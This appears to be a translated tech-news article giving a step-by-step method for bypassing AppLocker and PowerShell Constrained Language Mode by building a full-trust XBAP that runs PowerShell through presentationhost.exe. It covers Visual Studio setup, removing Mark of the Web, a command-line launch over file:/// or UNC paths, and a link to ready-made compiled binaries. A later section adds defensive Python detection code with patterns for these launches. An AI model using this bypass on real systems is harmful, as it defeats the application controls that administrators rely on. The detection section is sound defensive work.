2025-03-30 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
This article introduces how presentationhost.exe can be used to bypass AppLocker whitelist restrictions. It is quite detailed and has some reference value; interested readers should read on!
Presentationhost.exe is a built-in Windows executable for running XAML browser applications (that is, .xbap files). It appears on several AppLocker whitelist bypass lists (such as those of api0cradl and milkdevil), but there is very little information online on how to use it. I therefore decided to share my research results for your study and reference.
When you open an .xbap file it looks like an application launched in IE, but the code actually runs in another process (Presentationhost.exe), normally inside a sandbox that protects the user from malicious code. If you are familiar with Java Web Start files (.jnlp), XBAPs behave similarly, except that IE launches Presentationhost.exe instead of Java.exe and the code is written in C# instead of Java.
Note that an XBAP can request different permission levels. To perform potentially malicious actions the application must request unrestricted permissions, which are only granted when the XBAP is opened from a file location (that is, the local file system or a network share). If the application requests too many permissions, attempting to open the XBAP over HTTP or FTP will fail. For more information about the security model, see here.
To create an XBAP application, you can clone my PoC or follow these instructions to build your own:
1. Download the Visual Studio 2010 Professional Service Pack 1 trial.
2. Open Visual Studio and select "New, Project".
3. In the New Project dialog, search for "WPF Browser Application" and create a new Visual C# application.
After initializing the new project, you will see the following interface:
If you click Run, your default browser will open the .xbap file. If your default browser is not IE, copy the file:/// URL from the default browser's address bar into IE to open it. If all goes well, you should see the following warning message:
After clicking Run, a blank page appears. Let's create a simple UI with a box for entering a command on the left and the output on the right. I will also add a button with a click event.
If you try to run the application now, you will get an error that "Button_Click" is undefined. Open Page1.xaml.cs to define the button's click method. Here I use the C# Pipeline class to run PowerShell commands (interestingly, running PowerShell this way bypasses Constrained Language Mode). The following code runs a few PowerShell commands in a Pipeline and writes the output to the screen.
To compile the application you need to reference System.Management.Automation.dll: right-click the "References" folder in "Solution Explorer", select "Add Reference", then browse to:
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
After adding the reference you should be able to compile the project (if the project is not named "powershell", you may need to change the namespace). Running the XBAP should now succeed, but the following error occurs when you try to run a command:
This error is Presentationhost's sandbox telling you that the application is trying to do something above its permission level. For more information on XBAP security, see here. To have the XBAP request full trust (that is, non-sandboxed access to the operating system), go to Project -> Properties -> Security and select "This is a full trust application".
Run the application, and the PowerShell command should now execute normally.
The compiled application can be found in the \bin\Debug folder of the Visual Studio project:
powershell.exe
powershell.exe.manifest
powershell.pdb
powershell.xbap
To bypass the default AppLocker rules, copy these files to the locked-down computer and double-click the .xbap file. If you downloaded the files from a website they will not run, because they carry the Web mark (Mark of the Web). You can remove it by right-clicking the file and ticking the "Unblock" check box (or by using PowerShell).
If you do not want to copy files to the locked-down computer, you can also run Presentationhost from the command line with a file:/// URI or a UNC path, for example:
Presentationhost.exe file:///ipAddressOrHostName/powershell.xbap
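From the defender's side, this technique leaves two traces: PresentationHost.exe started with an .xbap, file:/// or UNC argument, and PresentationHost.exe loading System.Management.Automation.dll (the PowerShell runs in-process, so no powershell.exe child is spawned and a parent/child rule alone misses it). The Python triage below is an added example, not code from the original article or its repo; the Sysmon-style event fields and all sample paths are constructed.

```python
import re

# Constructed Sysmon-style records (not real telemetry): id 1 = process create,
# id 7 = image load. Only the fields the checks below need are modelled.
AUTOMATION_DLL = (r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation"
                  r"\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\PresentationHost.exe",
     "cmdline": r"PresentationHost.exe file:///C:/Users/alice/Downloads/app.xbap"},
    {"id": 1, "image": r"C:\Windows\System32\PresentationHost.exe",
     "cmdline": r'"C:\Windows\System32\PresentationHost.exe" -embedding'},  # benign form
    {"id": 7, "image": r"C:\Windows\System32\PresentationHost.exe", "loaded": AUTOMATION_DLL},
    {"id": 1, "image": r"C:\Windows\System32\PresentationHost.exe",
     "cmdline": r"PresentationHost.exe \\fileserver\share\app.xbap"},
    {"id": 7, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "loaded": AUTOMATION_DLL},  # the normal host for this DLL; must not fire
]

# The three launch forms the article describes: an .xbap argument, a file:/// URI, a UNC path.
LAUNCH_PATTERNS = [("xbap", r"(?i)\.xbap\b"), ("file-uri", r"(?i)file:///"),
                   ("unc", r"(?:^|\s)\\\\[^\\\s]+\\")]

def is_presentationhost(image):
    """Match on the file name only; the image may be quoted or live under SysWOW64."""
    return image.strip('"').lower().rsplit("\\", 1)[-1] == "presentationhost.exe"

def launch_tags(ev):
    """Event 1: return the LAUNCH_PATTERNS tags matched by a PresentationHost.exe start."""
    if ev["id"] != 1 or not is_presentationhost(ev["image"]):
        return []
    cmd = ev["cmdline"]
    return [tag for tag, pat in LAUNCH_PATTERNS if re.search(pat, cmd)]

def loads_powershell_engine(ev):
    """Event 7: PresentationHost.exe loading the PowerShell engine assembly.
    This is the in-process trace that a powershell.exe child-process rule never sees."""
    if ev["id"] != 7 or not is_presentationhost(ev["image"]):
        return False
    return ev["loaded"].lower().endswith("system.management.automation.dll")

def triage(events):
    """Return (reason, detail) findings for the two traces above, in event order."""
    findings = []
    for ev in events:
        tags = launch_tags(ev)
        if tags:
            findings.append(("launch:" + "+".join(tags), ev["cmdline"]))
        if loads_powershell_engine(ev):
            findings.append(("ps-engine-in-presentationhost", ev["loaded"]))
    return findings
```

On the constructed sample this yields three findings (two launches and one in-process engine load) and stays silent on the ordinary `-embedding` start and on powershell.exe loading its own engine.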
The source code of the PowerShell XBAP is here:
https://github.com/jpginc/xbapAppWhitelistBypassPOC/tree/master
I have included the compiled files in the repo so that you can run PowerShell in a locked-down environment; you can get the files there.